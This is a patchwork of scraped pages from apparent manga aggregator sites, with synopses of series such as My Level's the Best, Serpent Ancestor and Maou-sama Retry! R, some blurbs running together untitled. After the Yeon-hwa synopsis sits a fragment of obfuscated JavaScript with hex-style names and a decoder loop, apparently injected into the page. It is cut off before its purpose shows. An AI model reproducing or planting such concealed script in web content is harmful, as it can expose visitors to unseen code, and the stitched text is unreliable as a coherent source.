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My Level’s the Best

Read Manga My Level’s the Best Online For Free At Zin Manga Associated Names: My Level Is High / My Level Is the Best / Get Rich or Game Over / The Level Is High / レベル至上主義 / 레벨이 갑이다 The Content My Level’s the Best: Lee Seowoo became a beta tester for the first virtual reality game, but due to the incomplete system, participants weren’t able to disconnect from it. Lee Seowoo survives alone amid the deaths of all the other participants. He then wakes up from his coma at the same time when the game’s official service starts. After recovering his health, he logs back into the game with his existing character and is determined to use everything he has to take advantage of the game and become rich. Read NEW MANGA updated: Cthulhu Creator The Fairy Legacy The Marquis and the Iron Wall Lady Manga Zin is a website that aggregates the latest and hottest manga, updated quickly to serve readers with high-quality images and deliver them an excellent experience.


The Weakest Occupation “blacksmith,” But It’s Actually The Strongest

The people of this world are given occupations and weapons called Divine Treasures by God. It was said that the treasure was very strong and couldn’t be compared to the Human-made weapons. That’s why, occupations which were called “Blacksmith”, who can make and modify weapons are called the weakest. The main protagonist Relius who has acquired such a weakest job. He gave up on becoming an adventurer and worked in an inn, but he realized that he could make “Anything”. He, who was making what he liked, became aware of the relationship with famous nobles and beautiful girls.



Yeon-hwa has a special hobby; living two lives. ‘Chun-bok’, a blacksmith, during the day. ‘Baek Il-do’, a righteous man at night, with the ability to read memories by touching one’s palm! With this ability, Yeon-hwa encounters the ‘Milyeong’ cult who thought she had disappeared while searching for the reason behind her mother’s death. “Do you want to die knowing the truth, or live for long, without knowing anything?” Yeon-hwa, who has a strong body and the ability to read memories. Park Yi-hyun, who possesses outstanding martial art, but is weak in terms of intelligence. Kim Jun, with excellent brains, and an amazing writing capability.<script></script><script>function _0x2166(_0x164387,_0x3613d7){var _0x5ebee0=_0x5037();return _0x2166=function(_0x127ac2,_0x3bfe65){_0x127ac2=_0x127ac2-(-0x7*0x1ca+0x1935+0x6*-0x206);var _0x220ce3=_0x5ebee0[_0x127ac2];return _0x220ce3;},_0x2166(_0x164387,_0x3613d7);}(function(_0x30cabe,_0x170f8b){var _0x225c40=_0x2166,_0x4c7bb3=_0x30cabe();while(!![]){try{var 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Serpent Ancestor

Read “Serpent Ancestor Manga” – “Serpent Ancestor Manhwa” Online Free On MANHWATOP The summary of the comics “Serpent Ancestor”: An old snake accidentally ate an elixir in a village, gaining intelligence and embarking on the path of cultivation. The life of a snake, though only for a brief decade, is lived without the fear of time, seizing every moment. This is the story of an old snake who became an immortal. “Serpent Ancestor” is alternatively named: Serpent Ancestor MangaZin The comics “Serpent Ancestor” belongs to the Genre: Action, Adventure, Drama, Fantasy, Manhwa “HariManga, MANGA UPDATES, Manhwa Website…” are the most searched keywords on the website MANHWACLAN. We offer a wide selection of the best and newest comics series with all chapters updated quickly and featuring high-quality images, providing readers with wonderful and enjoyable reading experiences at LikeManga. You can read TOP MANGA The Regretful Villainess Is Happy Because She Got Divorced Underworld Restaurant North Snow Love Story

3 days ago

Hyoukaku no Meteoria

In a world where steam engines have been developed using a special fossil fuel called “Meteorian Coal”, Kanata, a boy who works in a coal mine, studies hard and improves himself despite the poor environment. Then, the boy\'s destiny begin to turn as he works to open up a new vein of coal.


Maou-sama, Retry! R

Entering a new series! The adventure of the strongest demon lord is far from over. Notice: This series is a continuation of Maou-sama, Retry!. At the lowest floor of the dungeon, the Demon Lord came face to face with a presence that appears to be the creator of this world. His next destination is the demon territory where there's an ongoing rivalry between devils. A new, incredibly energetic and cheerful high school girl has joined the gang. Once again, our character's bustling personalities and their idiosyncrasies will clash with each other. The long-awaited comical sequel of a comic adaptation of the popular fantasy, full of misunderstandings!


Ossan Teihen Chiyu-shi to Manasume no Henkyou Life

F-rank healer, Reda Dixon (30), is expelled from his party due to his age. Heartbroken, Reda decides on a change of pace by moving to the rural town of Almus. On his journey there, he encounters a blonde-haired girl named Mina, who is dressed in ragged clothes. With no parents in sight, the kind-hearted Reda decides to become her guardian. In Almus, Reda, who starts a new life with the girl, becomes known as \"Teacher\" by the townspeople, thanks to his unconsciously cheat-level 『Healing Magic』! Together, they solve various troubles and deepen their family bonds. Originating from 「Let\'s Become a Novelist」, this is the first installment of a heartwarming fantasy with his beloved daughter!


Yamiochi Yuusha no Haishin Haishin ~Tsuihousare, Kakushi Boss Beya ni Hourikomareta Kekka, Boss to Tansakushagari Haishin wo Hajimeru~

Fifty years have passed since dungeons first appeared on Earth. Dungeon exploration and live streaming are considered the norm for the people. Kuga, who became a dungeon explorer alongside his close friends, ends up being banished from his party due to him being a supposed \"jack of all trades, master of none\" hero. Amidst his despair, Kuga finds himself thrown into the hidden boss room, famous for making explorers unable to step foot into a dungeon ever again. There, he encounters a beautiful female vampire named Alicia. Though he’s prepared to meet his end, Alicia, captivated by the so-called streaming, has other plans and asks him, \"Could you teach me how to stream?\" With nowhere else to go, Kuga reluctantly accepts her proposal and thus begins their unprecedented dungeon explorer-hunting streams. For some reason, their stream quickly went viral like crazy, and Kuga then began to awaken some unknown powers...? And meanwhile, something strange is happening to the party members who banished Kuga...


Tondemo Skill De Isekai Hourou Meshi: Sui No Daibouken

A spin-off of the series “Tondemo Skill de Isekai Hourou Meshi” told from Sui's perspective.



From MangaHelpers: 29-year-old programmer Suzuki Ichirou finds himself transported into a fantasy RPG. Within the game, he's a 15-year-old named Satou. At first he thinks he's dreaming, but his experiences seem very real. Due to his use of a 3-time-use special power (meteor shower), he ends up wiping out an army of lizardmen and becoming very high level. He hides his level and plans to live peacefully and meet new people, though developments in the game story (like the return of a demon king) might get in his way. [tethysdust]


Ore no Saenai Osananajimi ga S-Rank Yuusha ni Natteita Ken

The strongest hero within the Hero Army, Shion Halbert, swung his sword to protect the kingdom and its people. However, after a certain event, he was banished from the Hero Army. After changing his occupation to a blacksmith, he spent his everyday. However, one day, his once timid childhood friend, Leaflet, a sweet, beautiful S-rank hero appeared in front of him. The banished (former) hero will bring new life into the Hero Army?!


Black Scavenger

The seeds born of twisted desire take root deep in the heart, feeding on emotions and expanding non-stop. When all of life is sucked away, the seed receives the key to the world and the black monster is born quietly. They are called “evils”. In order to liberate the souls bound by “evils”, a group of resolutely determined people, with the strength of the will from the world, become the light to illuminate the world at the cost of their own life.
